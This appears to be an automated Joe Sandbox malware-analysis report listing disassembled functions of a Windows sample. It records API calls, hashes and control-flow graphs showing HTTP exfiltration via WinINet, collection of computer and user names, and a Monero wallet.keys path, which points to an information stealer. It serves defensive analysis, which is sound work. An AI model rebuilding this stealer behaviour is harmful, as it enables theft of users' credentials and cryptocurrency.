                                        • Instruction ID: e70c7daf81228ef985952e15bc709cf049de0610c50b8eb37611fef4ad6ff30c
                                        • Opcode Fuzzy Hash: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
                                        • Instruction Fuzzy Hash: 8CA160B55002889FC358EFAAEDC89563BF9F74C30170D853EB605AB264E739B449CB16
                                        Function 00CA45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 ca45c0-ca4695 RtlAllocateHeap 781 ca46a0-ca46a6 764->781 782 ca474f-ca47a9 VirtualProtect 781->782 783 ca46ac-ca474a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA460F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CA479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46D8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA475A
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA473F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA466D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4713
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45C7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45D2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46CD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4678
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA474F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46AC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA477B
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46C2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA471E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4683
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4770
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4657
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45F3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4734
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45E8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4662
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4729
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: ea15ffbf8011afa6d3a7e4f1ce9673622df62570f1b5c55dfbea9db06bef973b
                                        • Instruction ID: e076dfe4d49963d078eb8a185b85037fc531e2d4df84415a07fe5082f072937e
                                        • Opcode Fuzzy Hash: ea15ffbf8011afa6d3a7e4f1ce9673622df62570f1b5c55dfbea9db06bef973b
                                        • Instruction Fuzzy Hash: 5E4115616C27047EEF68B7A4EC52F9DB762DF52708F5050EEFA0052280CFB87582C526
                                        Function 00CA4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 ca4880-ca4942 call cba7a0 call ca47b0 call cba740 * 5 InternetOpenA StrCmpCA 816 ca494b-ca494f 801->816 817 ca4944 801->817 818 ca4ecb-ca4ef3 InternetCloseHandle call cbaad0 call ca9ac0 816->818 819 ca4955-ca4acd call cb8b60 call cba920 call cba8a0 call cba800 * 2 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba920 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba920 call cba8a0 call cba800 * 2 InternetConnectA 816->819 817->816 828 ca4f32-ca4fa2 call cb8990 * 2 call cba7a0 call cba800 * 8 818->828 829 ca4ef5-ca4f2d call cba820 call cba9b0 call cba8a0 call cba800 818->829 819->818 905 ca4ad3-ca4ad7 819->905 829->828 906 ca4ad9-ca4ae3 905->906 907 ca4ae5 905->907 908 ca4aef-ca4b22 HttpOpenRequestA 906->908 907->908 909 ca4b28-ca4e28 call cba9b0 call cba8a0 call cba800 call cba920 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba920 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba920 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba9b0 call cba8a0 call cba800 call cba920 call cba8a0 call cba800 call cba740 call cba920 * 2 call cba8a0 call cba800 * 2 call cbaad0 lstrlen call cbaad0 * 2 lstrlen call cbaad0 HttpSendRequestA 908->909 910 ca4ebe-ca4ec5 InternetCloseHandle 908->910 1021 ca4e32-ca4e5c InternetReadFile 909->1021 910->818 1022 ca4e5e-ca4e65 1021->1022 1023 ca4e67-ca4eb9 InternetCloseHandle call cba800 1021->1023 1022->1023 1024 ca4e69-ca4ea7 call cba9b0 call cba8a0 call cba800 1022->1024 1023->910 1024->1021
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA4915
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA4ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CC0DDB,00000000,?,?,00000000,?,",00000000,?,009DF2A0), ref: 00CA4DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CA4E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA4E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA4E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4EC5
                                        • HttpOpenRequestA.WININET(00000000,009DF250,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA4B15
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA4ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: ce813f867d5b39341a13f7d04860c77449a5635d408ff9b06d8e4eb9d5722e7b
                                        • Instruction ID: 7f57a25da6431477275263945b8b60b708af9d9ff31906a66085447d23eafda4
                                        • Opcode Fuzzy Hash: ce813f867d5b39341a13f7d04860c77449a5635d408ff9b06d8e4eb9d5722e7b
                                        • Instruction Fuzzy Hash: 2912FA72910218AADB15EB91DCA2FEEB338BF15300F5041A9F14676491EF712F49EF62
                                        Function 00CB78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
                                        • Instruction ID: 3cc703521b1983fda92d6749ec5063e595aefeaf123dbe4e138aacd7f787f2c5
                                        • Opcode Fuzzy Hash: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
                                        • Instruction Fuzzy Hash: 1E0186B1D04248EFCB14DF95DD49BAABBB8F744B11F10426DF945E7280D7745A048BA1
                                        Function 00CB7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
                                        • Instruction ID: 0759b7305431c57cc2b3699d01dffbf2feb30131518bfc2eb447542da7c1595e
                                        • Opcode Fuzzy Hash: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
                                        • Instruction Fuzzy Hash: B5F04FB1944248AFCB04DF99DD89FAEBBB8EB04711F10026AFA05A2680D77525048BA2
                                        Function 00CA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
                                        • Instruction ID: ec702687337f6e576c3cf56484995a1bf2ec359fab07e5ef1d2c860924cfcfc2
                                        • Opcode Fuzzy Hash: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
                                        • Instruction Fuzzy Hash: 1BD05E7490030CDFCB00DFE1D8896EDBB78FB08316F040569ED0572340EA306486CAA6
                                        Function 00CB9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 cb9c10-cb9c1a 634 cb9c20-cba031 GetProcAddress * 43 633->634 635 cba036-cba0ca LoadLibraryA * 8 633->635 634->635 636 cba0cc-cba141 GetProcAddress * 5 635->636 637 cba146-cba14d 635->637 636->637 638 cba153-cba211 GetProcAddress * 8 637->638 639 cba216-cba21d 637->639 638->639 640 cba298-cba29f 639->640 641 cba21f-cba293 GetProcAddress * 5 639->641 642 cba337-cba33e 640->642 643 cba2a5-cba332 GetProcAddress * 6 640->643 641->640 644 cba41f-cba426 642->644 645 cba344-cba41a GetProcAddress * 9 642->645 643->642 646 cba428-cba49d GetProcAddress * 5 644->646 647 cba4a2-cba4a9 644->647 645->644 646->647 648 cba4ab-cba4d7 GetProcAddress * 2 647->648 649 cba4dc-cba4e3 647->649 648->649 650 cba515-cba51c 649->650 651 cba4e5-cba510 GetProcAddress * 2 649->651 652 cba612-cba619 650->652 653 cba522-cba60d GetProcAddress * 10 650->653 651->650 654 cba61b-cba678 GetProcAddress * 4 652->654 655 cba67d-cba684 652->655 653->652 654->655 656 cba69e-cba6a5 655->656 657 cba686-cba699 GetProcAddress 655->657 658 cba708-cba709 656->658 659 cba6a7-cba703 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,009C5528), ref: 00CB9C2D
                                        • GetProcAddress.KERNEL32(77190000,009C53E8), ref: 00CB9C45
                                        • GetProcAddress.KERNEL32(77190000,009D8E10), ref: 00CB9C5E
                                        • GetProcAddress.KERNEL32(77190000,009D8F78), ref: 00CB9C76
                                        • GetProcAddress.KERNEL32(77190000,009D8E28), ref: 00CB9C8E
                                        • GetProcAddress.KERNEL32(77190000,009DD6C8), ref: 00CB9CA7
                                        • GetProcAddress.KERNEL32(77190000,009CA6B8), ref: 00CB9CBF
                                        • GetProcAddress.KERNEL32(77190000,009DD788), ref: 00CB9CD7
                                        • GetProcAddress.KERNEL32(77190000,009DD758), ref: 00CB9CF0
                                        • GetProcAddress.KERNEL32(77190000,009DD710), ref: 00CB9D08
                                        • GetProcAddress.KERNEL32(77190000,009DD698), ref: 00CB9D20
                                        • GetProcAddress.KERNEL32(77190000,009C54E8), ref: 00CB9D39
                                        • GetProcAddress.KERNEL32(77190000,009C5588), ref: 00CB9D51
                                        • GetProcAddress.KERNEL32(77190000,009C55C8), ref: 00CB9D69
                                        • GetProcAddress.KERNEL32(77190000,009C5648), ref: 00CB9D82
                                        • GetProcAddress.KERNEL32(77190000,009DD6E0), ref: 00CB9D9A
                                        • GetProcAddress.KERNEL32(77190000,009DD7E8), ref: 00CB9DB2
                                        • GetProcAddress.KERNEL32(77190000,009CA820), ref: 00CB9DCB
                                        • GetProcAddress.KERNEL32(77190000,009C5708), ref: 00CB9DE3
                                        • GetProcAddress.KERNEL32(77190000,009DD7D0), ref: 00CB9DFB
                                        • GetProcAddress.KERNEL32(77190000,009DD728), ref: 00CB9E14
                                        • GetProcAddress.KERNEL32(77190000,009DD7B8), ref: 00CB9E2C
